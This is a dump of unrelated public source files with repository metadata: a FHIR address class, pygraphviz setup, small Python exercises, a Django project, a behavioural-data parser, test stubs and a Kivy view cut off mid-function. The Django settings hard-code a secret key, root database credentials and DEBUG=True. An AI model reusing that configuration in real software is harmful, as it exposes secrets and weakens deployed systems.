    resource_name = "Address"
    def __init__(self, jsondict=None, strict=True):
        """ Initialize all valid properties.
        :raises: FHIRValidationError on validation errors, unless strict is False
        :param dict jsondict: A JSON dictionary to use for initialization
        :param bool strict: If True (the default), invalid variables will raise a TypeError
        """
        self.city = None #type: str
        """ Name of city, town etc..
        Type `str`. """
        self.country = None #type: str
        """ Country (can be ISO 3166 3 letter code).
        Type `str`. """
        self.district = None #type: str
        """ District name (aka county).
        Type `str`. """
        self.line = None #type: List[str]
        """ Street name, number, direction & P.O. Box etc..
        List of `str` items. """
        self.period = None #type: period.Period
        """ Time period when address was/is in use.
        Type `Period` (represented as `dict` in JSON). """
        self.postalCode = None #type: str
        """ Postal code for area.
        Type `str`. """
        self.state = None #type: str
        """ Sub-unit of country (abbreviations ok).
        Type `str`. """
        self.text = None #type: str
        """ Text representation of the address.
        Type `str`. """
        self.type = None #type: str
        """ postal | physical | both.
        Type `str`. """
        self.use = None #type: str
        """ home | work | temp | old - purpose of this address.
        Type `str`. """
        super(Address, self).__init__(jsondict=jsondict, strict=strict)
    def __str__(self):
        # NOTE(review): intentionally returns the empty string -- appears to
        # be a generator stub; confirm before relying on str(Address).
        return ''
    def elementProperties(self):
        # Each tuple appears to describe one serializable property as
        # consumed by element.Element:
        # (name, json_name, type, is_list, of_many, not_optional) -- confirm
        # against the base class before changing.
        js = super(Address, self).elementProperties()
        js.extend([
            ("city", "city", str, False, None, False),
            ("country", "country", str, False, None, False),
            ("district", "district", str, False, None, False),
            ("line", "line", str, True, None, False),
            ("period", "period", period.Period, False, None, False),
            ("postalCode", "postalCode", str, False, None, False),
            ("state", "state", str, False, None, False),
            ("text", "text", str, False, None, False),
            ("type", "type", str, False, None, False),
            ("use", "use", str, False, None, False),
        ])
        return js
from . import period
| [
"henk-jan.van.reenen@nlhealthcareclinics.com"
] | henk-jan.van.reenen@nlhealthcareclinics.com |
30778759c840d8ed1e486027a1193056053b1267 | 8c3af416370dca5d7b464b486b535e4fdd205ff2 | /pygraphviz/__init__.py | a807801fc9916b7f2f1c649a0d66c69b237194f2 | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] | permissive | arruda/pygraphviz | 7518823737fc532d898d43bf71c26a7a5cb8c4bf | 8e448527ff9b1df79c5c42e353f19d056797d9bc | refs/heads/master | 2016-08-03T12:19:48.122491 | 2011-07-31T22:03:57 | 2011-07-31T22:03:57 | 2,175,550 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,809 | py | """
A Python wrapper for the graphviz Agraph data structure.
Quick example::
>>> from pygraphviz import *
>>> G=AGraph()
>>> G.add_node('a')
>>> G.add_edge('b','c')
>>> print G # doctest: +SKIP
strict graph {
a;
b -- c;
}
<BLANKLINE>
See pygraphviz.AGraph for detailed documentation.
"""
# Copyright (C) 2004-2010 by
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Manos Renieris, http://www.cs.brown.edu/~er/
# Distributed with BSD license.
# All rights reserved, see LICENSE for details.
# Release data
import release
# Resolve __version__/__revision__/__date__ from either the static
# version.py written at install time or the dynamic release module.
if release.revision is None:
    # we are probably not running from an svn working copy
    try:
        # use release data stored at installation time.
        import version
        __version__ = version.__version__
        __revision__ = version.__revision__
        __date__ = version.__date__
    except ImportError:
        # version.py was not created or no longer exists
        __version__ = release.version
        __revision__ = release.revision
        __date__ = release.date
else:
    # use dynamic values, even if version.py exists
    __version__ = release.version
    __revision__ = release.revision
    __date__ = release.date
__author__ = '%s <%s>\n%s <%s>\n%s <%s>' % \
    ( release.authors['Hagberg'] + release.authors['Schult'] + \
      release.authors['Renieris'] )
__license__ = release.license
# Python 2 implicit relative import of the sibling agraph module.
from agraph import AGraph, Node, Edge, Attribute, ItemAttribute
__all__=[
    'AGraph',
    'Node',
    'Edge',
    'Attribute',
    'ItemAttribute'
    ]
def version():
    """Print the pygraphviz version, then the installed graphviz version
    (by shelling out to ``neato -V``)."""
    from agraph import _get_prog
    import os
    print "pygraphviz-"+__version__
    # neato prints its version banner to stderr.
    neato=_get_prog('neato')
    os.system(neato+' -V')
# import tests: run as pygraphviz.test()
from tests import run as test
| [
"aric@3ed01bd8-26fb-0310-9e4c-ca1a4053419f"
] | aric@3ed01bd8-26fb-0310-9e4c-ca1a4053419f |
d5e93ff63e27e52cc36be5db20e4b14098d39c90 | 0be496ab33e732c8e25557a6fadba70b305d90b9 | /Task_Four/Ques6.py | aa2c48c3d16395664e1631cd0ce38df4fead0126 | [] | no_license | DharaTandel/Python | a7bbd7a4794b2c7e844de3127fa2ea5e9321e99c | a33d8237817e63ad1fe4f1f9579de16f0a8c984e | refs/heads/main | 2023-03-30T00:40:41.921856 | 2021-03-29T00:15:19 | 2021-03-29T00:15:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 84 | py | def Sum(a,b):
S= int(a)+int(b)
return S
x="10"
y="20"
print(Sum(x,y)) | [
"noreply@github.com"
] | noreply@github.com |
7b480b508fc082bd44699b3765985666f6a32593 | 0db91f8a6b295ff72b0cb3e7e6b1ddf2a39f7c1e | /moorse_code1.py | f433dfc4a9f97cbca0af9d7b52f7771d0375f5d9 | [] | no_license | alphabetz/dailyprogrammer | 3fb239a3ae8bfb1ce7886584b479e8d5075f671a | ce78ef4f18b409cf8659f9ebe21fb672abe920b4 | refs/heads/master | 2020-07-11T22:56:47.111546 | 2019-09-05T08:18:34 | 2019-09-05T08:18:34 | 204,661,529 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 877 | py | # r/dailyprogrammer
# easy #380
# Smooshed Morse Code 1
# write Moorse code generator
def smorse(text):
    """Print *text* (lower-cased) followed by its smooshed Morse encoding.

    "Smooshed" means the per-letter codes are concatenated with no
    separators, e.g. ``sos ==> ...---...``.  Only the letters a-z are
    supported; any other character raises KeyError.
    """
    # Letter -> International Morse code.
    code = {
        'a' : '.-',
        'b' : '-...',
        'c' : '-.-.',
        'd' : '-..',
        'e' : '.',
        'f' : '..-.',
        'g' : '--.',
        'h' : '....',
        'i' : '..',
        'j' : '.---',
        'k' : '-.-',
        'l' : '.-..',
        'm' : '--',
        'n' : '-.',
        'o' : '---',
        'p' : '.--.',
        'q' : '--.-',
        'r' : '.-.',
        's' : '...',
        't' : '-',
        'u' : '..-',
        'v' : '...-',
        'w' : '.--',
        'x' : '-..-',
        'y' : '-.--',
        'z' : '--..'
    }
    text = text.lower()
    print(text, "==> ", end='')
    # Iterate characters directly instead of indexing by range(len(text));
    # the old commented-out O(26)-scan of the dict was dead code and is gone.
    for ch in text:
        print(code[ch], end='')
    print('')
# Demo runs against the challenge's example inputs.
smorse("sos")
smorse("daily")
smorse("programmer")
smorse("bits")
smorse("three")
| [
"rm.ratthapong@gmail.com"
] | rm.ratthapong@gmail.com |
6b8edfa952b17f7a238eef9bfbc6a14d6c47eec1 | 1a19dac76dc82d4de3e6fb95b7cf84478dd41ad9 | /accounts/migrations/0004_remove_profile_status.py | 224a1ad816d867c6058e184b0d339655d6828888 | [] | no_license | Kambaulaya1234/inventory | c5715dcc1af1820797b67ecb0d7c167b491bd87a | 8c244be36a49433fd9cecae5eb36682881d33978 | refs/heads/main | 2023-04-19T21:43:33.609816 | 2021-05-06T05:43:21 | 2021-05-06T05:43:21 | 364,646,910 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 330 | py | # Generated by Django 3.0.5 on 2020-04-24 12:44
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated: drops the unused 'status' field from accounts.Profile."""
    dependencies = [
        ('accounts', '0003_auto_20200424_0930'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='profile',
            name='status',
        ),
    ]
| [
"mwaluandagaspa@gmail.com"
] | mwaluandagaspa@gmail.com |
aff99ca9c0437f8148335598643af70076e96820 | aeb215ecd792ab99c722e864728d388fe69c545f | /templeB.py | a49bf3a6e3c1b0169646c01890bc40f785317d31 | [] | no_license | kcho/templeBehavioural | d07e9b4aaf0123de5c3504d78e3f3b45fbfb7c9c | b8b9d386671b31be1d2f138c547d264434c28d30 | refs/heads/master | 2020-05-19T10:04:53.869137 | 2014-07-24T13:25:42 | 2014-07-24T13:25:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,276 | py | #!/Users/admin/anaconda/bin/python
import unicodedata
import re
import codecs
import os
import csv
import argparse
import textwrap
import pandas as pd
import numpy as np
def findBehaviourDir(directory):
    """Return every directory under *directory* whose path contains
    'Behavior_Data', printing each match as it is found."""
    behaviourDir=[]
    for root,dirs,files in os.walk(directory):
        if re.search('Behavior_Data',root):
            print root
            behaviourDir.append(root)
    return behaviourDir
def main(args):
    """Pipeline entry point: locate behaviour dirs, parse their logs into
    per-subject tables, merge into one DataFrame, and write it to Excel."""
    behaviourDirs = findBehaviourDir(os.path.abspath(args.directory))
    tables = readTables(behaviourDirs)
    mergedDf = tables2Df(tables)
    toExcel(mergedDf)
def tables2Df(tables):
    """Concatenate the per-subject dicts from readTables() into one
    (subject, timeline, condition, value)-indexed DataFrame with a per-row
    'average' column across runs.

    NOTE(review): the index labels name the first two tuple slots
    'ACC'/'RT', but readTables() stores (trial count, mean RT) there --
    confirm the intended naming.
    """
    init=pd.DataFrame()
    for dictWithMean in tables:
        # dictionary into dataframe
        df=pd.DataFrame.from_dict(dictWithMean)
        # set index names
        df.index=['ACC','RT','subjectName','timeline']
        # transpose the table
        df = df.T
        # name them: keys were (run letter, condition) tuples
        df.index = pd.MultiIndex.from_arrays([[x[0] for x in df.index],
            [x[1] for x in df.index]],names=['Run','Detail'])
        # initialise the index
        dfIndexReset = df.reset_index()
        # pivot table
        pivotTable = pd.pivot_table(dfIndexReset,
                values=['ACC','RT'],
                columns=['Run'],
                index=['subjectName','timeline','Detail'],
                aggfunc=np.sum)
        # column name set
        pivotTable.columns.names=['value','Run']
        # value column to index
        table = pivotTable.stack('value')
        # swaplevels of the index
        table.index = table.index.swaplevel(2,3)
        # order index
        table = table.sortlevel()
        # adding average across runs
        table['average'] = table.T.mean()
        # merging
        init = pd.concat([init,table])
    return init
def readTables(behaviourDirs):
    """For each behaviour directory, parse its E-Prime 'Temple*.txt' logs and
    build a dict keyed by (run letter, condition) whose value is
    (trial count, mean RT, subject name, timeline).

    Subject names are expected to match MEDnn/CONnn and paths must contain
    'pre' or 'post' -- re.search(...).group() raises AttributeError otherwise.
    """
    tables = []
    # for each behaviourDirs
    for behaviourDir in behaviourDirs:
        # get subject name
        subjectName = re.search('((MED|CON)\d{2})',behaviourDir).group(1)
        # get timeline
        timeline = re.search('(pre|post)',behaviourDir).group(1)
        # find log texts
        textList = [os.path.join(behaviourDir,x) for x in os.listdir(behaviourDir) if re.search('Temple.*txt$',x)]
        # for each log text
        # make a directory
        dictWithMean = {}
        for text in textList:
            # getInfo() returns {'cong'|'incong'|'spatial'|'alert'|'noQue':
            #                    [trial log fragments]}
            dictionary = getInfo(text)
            for name,trialTexts in dictionary.iteritems():
                mean = getMean(trialTexts)
                # key: (run letter taken from the filename, condition name)
                dictWithMean[(os.path.basename(text)[-5],name)]=(
                        len(trialTexts),mean,subjectName,timeline,)
        tables.append(dictWithMean)
    return tables
def toExcel(mergedDf):
    """Re-index, sort and write the merged DataFrame to the project's
    behaviour.xlsx spreadsheet.

    NOTE(review): the output path is hard-coded to a mounted volume --
    consider making it a CLI argument.
    """
    mergedDf.index = pd.MultiIndex.from_tuples(mergedDf.index)
    #print mergedDf.head()
    mergedDf.index.names=['subject','timeline','variable','condition']
    mergedDf = mergedDf.sortlevel(level=1,ascending=False,sort_remaining=False).sortlevel(level=0,sort_remaining=False)
    #print mergedDf.index.sortlevel(level=1)
    writer = pd.ExcelWriter('/Volumes/promise/CCNC_SNU_temple_2014/3_dataSpreadSheet/behaviour.xlsx')
    mergedDf.to_excel(writer,'Sheet1')
    writer.save()
writer.save()
def getMean(trialTexts):
    """Return the mean 'SlideTarget.RT' reaction time over *trialTexts*.

    Each entry must contain a ``SlideTarget.RT: <int>`` field (otherwise
    re.search() returns None and .group() raises AttributeError).  An empty
    list yields 0 instead of raising.
    """
    total = 0.0
    for trialText in trialTexts:
        # Reaction time in ms, embedded in the E-Prime log fragment.
        total += float(re.search(r'SlideTarget.RT: (\d+)', trialText).group(1))
    try:
        return total / len(trialTexts)
    except ZeroDivisionError:
        # No trials of this condition for the subject/run.
        return 0
def getInfo(textFile):
    """Parse one UTF-16 E-Prime log and bucket its correct, sub-2000ms
    trials by condition.

    Returns {'cong', 'incong', 'spatial', 'alert', 'noQue': [log fragments]}.
    'wrongTrials' is computed but intentionally not returned (see the
    commented-out full dictionary below).
    """
    #print textFile
    #print '='*25
    #with codecs.open(textFile, encoding='utf-16') as f, open('output.csv', 'w') as fout:
        #text = f.read()
    with codecs.open(textFile, encoding='utf-16') as f:
        text = f.read()
    # Each '*** LogFrame Start ***' marker delimits one trial record.
    textSplit = text.split('*** LogFrame Start ***')
    #correct trials only
    correctTrials = [x for x in textSplit if re.search('SlideTarget.ACC: 1',x)]
    #print 'correct : {0}'.format(len(correctTrials))
    wrongTrials = [x for x in textSplit if re.search('SlideTarget.ACC: 0',x)]
    # keep correct trials with reaction time under 2000 ms
    lessThan2000 = [x for x in correctTrials if int(re.search('SlideTarget.RT: (\d+)',x).group(1)) < 2000]
    congruent = [x for x in lessThan2000 if 'FlankingType: congruent' in x]
    incongruent = [x for x in lessThan2000 if 'FlankingType: incongruent' in x]
    # Cue position encodes the cue type (ANT paradigm); values assumed from
    # the experiment layout -- TODO confirm against the E-Prime script.
    spatial = [x for x in lessThan2000 if 'CuePositionY: 270' in x or 'CuePositionY: 210' in x]
    alert = [x for x in lessThan2000 if 'CuePositionY: 240' in x]
    noQue = [x for x in lessThan2000 if 'CuePositionY: -100' in x]
    #dictionary = {'correct':correctTrials,
    #'wrong':wrongTrials,
    #'cong':congruent,
    #'incong':incongruent,
    #'spatial':spatial,
    #'alert':alert,
    #'noQue':noQue}
    #without correct / wrong list
    dictionary = {'cong':congruent,
                  'incong':incongruent,
                  'spatial':spatial,
                  'alert':alert,
                  'noQue':noQue}
    return dictionary
if __name__=='__main__':
    # NOTE(review): the help text mentions "diffusion tensor images" --
    # looks copied from another script; confirm and update the wording.
    parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,
        description = textwrap.dedent('''\
            {codeName} : Pre-process the new diffusion tensor images
            ==========================================================
            eg) {codeName}
            eg) {codeName} --dir /Users/kevin/NOR04_CKI
            eg) {codeName} --dir /Users/kevin/NOR04_CKI
            '''.format(codeName=os.path.basename(__file__))))
    parser.add_argument('-dir','--directory',help='Data directory location',
            default='/Volumes/promise/CCNC_SNU_temple_2014/2_data')
    args = parser.parse_args()
    main(args)
| [
"cke8671@hotmail.com"
] | cke8671@hotmail.com |
e4ffd83343645d489fd7f0901317a07d4bdea4b1 | c0a25bd77d98e6087c745d5fa2862c4a715a8f59 | /standupmeeting/settings.py | 241a863296e0a608133996cb32846d82c37359a1 | [] | no_license | codyowl/standupmeeting | a84f356b611bd87956b9aa15c58a6ca63fbffebc | bd2a782406901f492f54c1780e1d85d07fe51c20 | refs/heads/master | 2021-01-21T15:18:49.137211 | 2017-06-17T17:47:40 | 2017-06-17T17:47:40 | 91,837,500 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,870 | py | """
Django settings for standupmeeting project.
Generated by 'django-admin startproject' using Django 1.8.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
# Project root: two levels up from this settings module.
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): key is committed to source control -- rotate it and load
# from an environment variable before deploying.
SECRET_KEY = 'z5)=jv1ho$%@891l#l)x47*zq@4*!0$v07fk@srtz+2)rps^3j'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    # project apps
    'accounts',
    'home',
    'dashboard',
    'core',
)
MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'standupmeeting.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'templates')],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'standupmeeting.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
# NOTE(review): credentials are hard-coded; move to environment variables.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.mysql',
        'NAME': 'standupmeeting',
        'USER': 'root',
        'PASSWORD': 'root',
    }
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = 'staticfiles'
STATICFILES_DIRS = (
    os.path.join(BASE_DIR, 'static'),
)
"codyowl@gmail.com"
] | codyowl@gmail.com |
1b6a2aa29c25d01d109682bef2c4e146e7d3ae9a | 7b4cc3814338b600db560324e615cf5c3a02bff5 | /test/test_inline_response20019_ranks_sum.py | 7c843351bb5fea0cf90e0166453b3ff6628bd10a | [] | no_license | wood-run/opendota-client | 58ea278c94d3edad0daf695438d5ec2a3d90fe08 | 2cd7defca67c7efde4ee414e9dcd8685245cd167 | refs/heads/master | 2022-12-29T02:17:26.862289 | 2020-10-13T08:29:06 | 2020-10-13T08:29:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,511 | py | # coding: utf-8
"""
OpenDota API
# Introduction The OpenDota API provides Dota 2 related data including advanced match data extracted from match replays. You can find data that can be used to convert hero and ability IDs and other information provided by the API from the [dotaconstants](https://github.com/odota/dotaconstants) repository. **Beginning 2018-04-22, the OpenDota API is limited to 50,000 free calls per month and 60 requests/minute** We offer a Premium Tier with unlimited API calls and higher rate limits. Check out the [API page](https://www.opendota.com/api-keys) to learn more. # noqa: E501
OpenAPI spec version: 18.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import opendota_client
from opendota_client.models.inline_response20019_ranks_sum import InlineResponse20019RanksSum # noqa: E501
from opendota_client.rest import ApiException
class TestInlineResponse20019RanksSum(unittest.TestCase):
    """InlineResponse20019RanksSum unit test stubs.
    Auto-generated by swagger-codegen (see file header); the construction
    test is left as a FIXME until example attribute values are filled in.
    """
    def setUp(self):
        pass
    def tearDown(self):
        pass
    def testInlineResponse20019RanksSum(self):
        """Test InlineResponse20019RanksSum"""
        # FIXME: construct object with mandatory attributes with example values
        # model = opendota_client.models.inline_response20019_ranks_sum.InlineResponse20019RanksSum()  # noqa: E501
        pass
if __name__ == '__main__':
unittest.main()
| [
"chujiyang@gmail.com"
] | chujiyang@gmail.com |
88eaf22c767ec5d231450ea9686ec6949a2023e5 | a9760e9fe6d81cfeb76044a43008eee2adf0295b | /choose_your_own/your_algorithm.py | eea887add072af15e85eb41e6eb922be2fbe7319 | [] | no_license | Valentine-Mario/Machine-learning | 9ff39e33fe6dc4a4e88efaa03b3f36ebbd3aeacc | 6a4261830057f104adbcff67c5e131707e124735 | refs/heads/master | 2022-07-18T17:37:44.582421 | 2020-02-03T18:14:14 | 2020-02-03T18:14:14 | 223,941,245 | 0 | 0 | null | 2022-06-21T23:32:48 | 2019-11-25T12:15:51 | DIGITAL Command Language | UTF-8 | Python | false | false | 2,084 | py | #!/usr/bin/python
import matplotlib.pyplot as plt
from prep_terrain_data import makeTerrainData
from class_vis import prettyPicture
from sklearn.neighbors import KNeighborsClassifier
from sklearn.metrics import accuracy_score
from sklearn.ensemble import AdaBoostClassifier
from sklearn.ensemble import RandomForestClassifier
# Generate the synthetic terrain dataset (Udacity "choose your own" exercise).
features_train, labels_train, features_test, labels_test = makeTerrainData()
### the training data (features_train, labels_train) have both "fast" and "slow"
### points mixed together--separate them so we can give them different colors
### in the scatterplot and identify them visually
grade_fast = [features_train[ii][0] for ii in range(0, len(features_train)) if labels_train[ii]==0]
bumpy_fast = [features_train[ii][1] for ii in range(0, len(features_train)) if labels_train[ii]==0]
grade_slow = [features_train[ii][0] for ii in range(0, len(features_train)) if labels_train[ii]==1]
bumpy_slow = [features_train[ii][1] for ii in range(0, len(features_train)) if labels_train[ii]==1]
#### initial visualization
plt.xlim(0.0, 1.0)
plt.ylim(0.0, 1.0)
# NOTE(review): the "fast" series plots (bumpy, grade) but the "slow"
# series plots (grade, bumpy) -- the axes look swapped for one of them.
plt.scatter(bumpy_fast, grade_fast, color = "b", label="fast")
plt.scatter(grade_slow, bumpy_slow, color = "r", label="slow")
plt.legend()
plt.xlabel("bumpiness")
plt.ylabel("grade")
plt.show()
################################################################################
### your code here!  name your classifier object clf if you want the
### visualization code (prettyPicture) to show you the decision boundary
# Active classifier: k-nearest neighbours (k=3).
#for knn
clf = KNeighborsClassifier(n_neighbors=3)
clf.fit(features_train, labels_train)
predict= clf.predict(features_test)
# Alternative classifiers tried during the exercise, kept for reference:
#adaboost
# clf = AdaBoostClassifier(n_estimators=100, random_state=0)
# clf.fit(features_train, labels_train)
# predict=clf.predict(features_test)
#random forest
# clf = RandomForestClassifier(max_depth=2, random_state=0)
# clf.fit(features_train, labels_train)
# predict=clf.predict(features_test)
accuracy=accuracy_score(predict, labels_test)
print(accuracy)
# prettyPicture may be undefined depending on the helper module version.
try:
    prettyPicture(clf, features_test, labels_test)
except NameError:
    pass
| [
"valentine13400@gmail.com"
] | valentine13400@gmail.com |
75a51dcedafba4f54f170bc433e959f80f46a919 | 61e98b0302a43ab685be4c255b4ecf2979db55b6 | /sdks/python/.tox/lint/lib/python2.7/site-packages/pylint/test/functional/too_many_nested_blocks.py | 47dbf441bd71b32547d4d652a501a6d3189ff396 | [
"BSD-3-Clause",
"EPL-2.0",
"CDDL-1.0",
"Apache-2.0",
"WTFPL",
"GPL-2.0-only",
"BSD-2-Clause",
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"CDDL-1.1",
"Classpath-exception-2.0"
] | permissive | dzenyu/kafka | 5631c05a6de6e288baeb8955bdddf2ff60ec2a0e | d69a24bce8d108f43376271f89ecc3b81c7b6622 | refs/heads/master | 2021-07-16T12:31:09.623509 | 2021-06-28T18:22:16 | 2021-06-28T18:22:16 | 198,724,535 | 0 | 0 | Apache-2.0 | 2019-07-24T23:51:47 | 2019-07-24T23:51:46 | null | UTF-8 | Python | false | false | 2,259 | py | """Checks the maximum block level is smaller than 6 in function definitions"""
#pylint: disable=using-constant-test, missing-docstring, too-many-return-statements
def my_function():  # fixture: first branch is 6 blocks deep, second is 5
    if 1: # [too-many-nested-blocks]
        for i in range(10):
            if i == 2:
                while True:
                    try:
                        if True:
                            i += 1
                    except IOError:
                        pass
    if 1:
        for i in range(10):
            if i == 2:
                while True:
                    try:
                        i += 1
                    except IOError:
                        pass
def nested_func():  # fixture: 5 levels, just under the default limit
    if True:
        for i in range(10):
            while True:
                if True:
                    if True:
                        yield i
nested_func()  # silences unused-function style warnings; generator never runs
def more_complex_function():  # fixture: branchy but shallow -- no message
    attr1 = attr2 = attr3 = [1, 2, 3]
    if attr1:
        for i in attr1:
            if attr2:
                return i
            else:
                return 'duh'
    elif attr2:
        for i in attr2:
            if attr2:
                return i
            else:
                return 'duh'
    else:
        for i in range(15):
            if attr3:
                return i
            else:
                return 'doh'
    return None
def elif_function():  # fixture: elif chains do not add nesting depth
    arg = None
    if arg == 1:
        return 1
    elif arg == 2:
        return 2
    elif arg == 3:
        return 3
    elif arg == 4:
        return 4
    elif arg == 5:
        return 5
    elif arg == 6:
        return 6
    elif arg == 7:
        return 7
def else_if_function():  # fixture: else-nested ifs DO add depth -> message
    arg = None
    if arg == 1: # [too-many-nested-blocks]
        return 1
    else:
        if arg == 2:
            return 2
        else:
            if arg == 3:
                return 3
            else:
                if arg == 4:
                    return 4
                else:
                    if arg == 5:
                        return 5
                    else:
                        if arg == 6:
                            return 6
                        else:
                            if arg == 7:
                                return 7
| [
"alex.barreto@databricks.com"
] | alex.barreto@databricks.com |
c9d7473a10ec6484bfb9f69df952c0a761dd359d | 7624e2cab8bcd6b7cf1d9b5c611610f7ca050dac | /internbot/view/topline_view/appendix_view.py | 20d0c7d8e6f100d9f1a28b3051769b7a63a921d8 | [] | no_license | carolinedarling/internbot | 95aaaad81f81cbbbea2f7a04a6ff819f222290df | beebc0e168e405e246392ebf91f3b01562878728 | refs/heads/master | 2022-04-01T03:14:59.929299 | 2019-12-11T18:25:02 | 2019-12-11T18:25:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,141 | py | ## outside modules
import kivy
kivy.require('1.11.1')
from kivy.app import App
from kivy.uix.button import Button
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.image import Image
from kivy.graphics import Color, Rectangle
from kivy.uix.popup import Popup
from kivy.uix.label import Label
from kivy.core.text import LabelBase
from kivy.uix.textinput import TextInput
from kivy.uix.filechooser import FileChooserListView, FileChooserIconView
import webbrowser
import os
class AppendixView(BoxLayout):
    def __init__(self, **kwargs):
        """Build the view and pre-construct every popup/dialog it can show."""
        super(AppendixView, self).__init__(**kwargs)
        # Report-type flags toggled by the selector popups.
        self.__is_doc_report = True
        self.__is_qualtrics = False
        # Popups are created once up front and opened on demand.
        self.open_file_prompt = self.create_open_file_prompt()
        self.open_file_dialog = self.create_open_file_dialog()
        self.report_selector = self.create_report_selector()
        self.document_format_selector = self.create_document_format_selector()
        self.spreadsheet_format_selector = self.create_spreadsheet_format_selector()
        self.other_template_dialog = self.create_other_template_dialog()
        self.save_file_prompt = self.create_save_file_prompt()
    def create_open_file_prompt(self):
        """Return the popup asking the user to pick an appendix .csv file,
        with a link to example verbatim files on Dropbox."""
        popup_layout = BoxLayout(orientation='vertical')
        help_text = "Choose labelled appendix verbatims (.csv) file\n\n"
        help_text += "[ref=click][color=F3993D]Click here for examples of verbatim files[/color][/ref]"
        def examples_link(instance, value):
            # Opens the examples folder in the system browser.
            webbrowser.open("https://www.dropbox.com/sh/tmg33zeh71sb71k/AAB5tpanqADX96yB3VL5yLw_a?dl=0")
        label = Label(text=help_text, markup=True)
        label.bind(on_ref_press=examples_link)
        label.font_family= "Y2"
        popup_layout.add_widget(label)
        # '>' advances to the actual file-chooser dialog.
        save_btn = Button(text='>', size_hint=(.2,.2))
        save_btn.pos_hint={'center_x': 0.5, 'center_y': 0.5}
        save_btn.bind(on_release=self.open_file_prompt_to_dialog)
        popup_layout.add_widget(save_btn)
        popup = Popup(title="Select appendix file",
                      content=popup_layout,
                      size_hint=(.7, .5), pos_hint={'center_x': 0.5, 'center_y': 0.5})
        return popup
    def create_open_file_dialog(self):
        """Return the file-chooser popup; on 'open' it stores the chosen
        .csv path and advances to the report selector."""
        chooser = BoxLayout()
        container = BoxLayout(orientation='vertical')
        def open_file(path, filename):
            try:
                # filename is the chooser's selection list; empty when the
                # user clicked 'open' without picking a file.
                filepath = os.path.join(path, filename[0])
                self.__open_filename = filepath
                self.open_file_dialog_to_report_selector()
            except IndexError:
                self.error_message("Please pick an appendix (.csv) file")
        filechooser = FileChooserListView()
        filechooser.path = os.path.expanduser("~")
        filechooser.bind(on_selection=lambda x: filechooser.selection)
        filechooser.filters = ["*.csv"]
        open_btn = Button(text='open', size_hint=(.2,.1), pos_hint={'center_x': 0.5, 'center_y': 0.5})
        open_btn.bind(on_release=lambda x: open_file(filechooser.path, filechooser.selection))
        container.add_widget(filechooser)
        container.add_widget(open_btn)
        chooser.add_widget(container)
        file_chooser = Popup(title='Open file',
                             content=chooser,
                             size_hint=(.9, .7 ), pos_hint={'center_x': 0.5, 'center_y': 0.5})
        return file_chooser
def create_report_selector(self):
    """Build the popup asking whether to produce a document or a spreadsheet report."""
    chooser = BoxLayout(orientation='vertical')
    help_text = "Choose from the following report options\n\n"
    help_text += "[ref=click][color=F3993D]Click here for examples of report formats[/color][/ref]"
    # Open example report formats in the browser when the [ref] link is tapped.
    def examples_link(instance, value):
        webbrowser.open("https://www.dropbox.com/sh/pcpgh1uin5lzt3w/AABHLm6f_bKzh_RIWqslqFKSa?dl=0")
    label = Label(text=help_text, markup=True)
    label.bind(on_ref_press=examples_link)
    label.font_family = "Y2"
    chooser.add_widget(label)
    button_layout = BoxLayout()
    button_layout.size_hint = (1, .1)
    # Each button routes to the matching is_* handler, which records the choice.
    doc_btn = Button(text="Document", on_press=self.is_doc)
    spr_btn = Button(text="Spreadsheet", on_press=self.is_sheet)
    button_layout.add_widget(doc_btn)
    button_layout.add_widget(spr_btn)
    chooser.add_widget(button_layout)
    report_chooser = Popup(title='Choose format',
